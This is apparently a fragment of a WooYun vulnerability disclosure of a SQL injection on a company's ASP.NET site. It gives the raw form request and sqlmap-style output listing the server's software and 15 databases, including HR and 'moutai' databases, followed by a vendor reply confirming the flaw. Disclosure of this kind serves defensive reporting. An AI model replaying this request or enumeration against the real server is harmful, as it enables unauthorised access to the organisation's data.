&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [15]:
[*] DrpECO
[*] EA
[*] gy
[*] HR
[*] HRTest
[*] master
[*] model
[*] moutaiBak
[*] moutaiDev
[*] moutaiTest
[*] msdb
[*] QRTest
[*] rsda
[*] tempdb
[*] test

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-08 09:29

厂商回复:

感谢您的反馈,我们将尽快修复!

最新状态:

暂无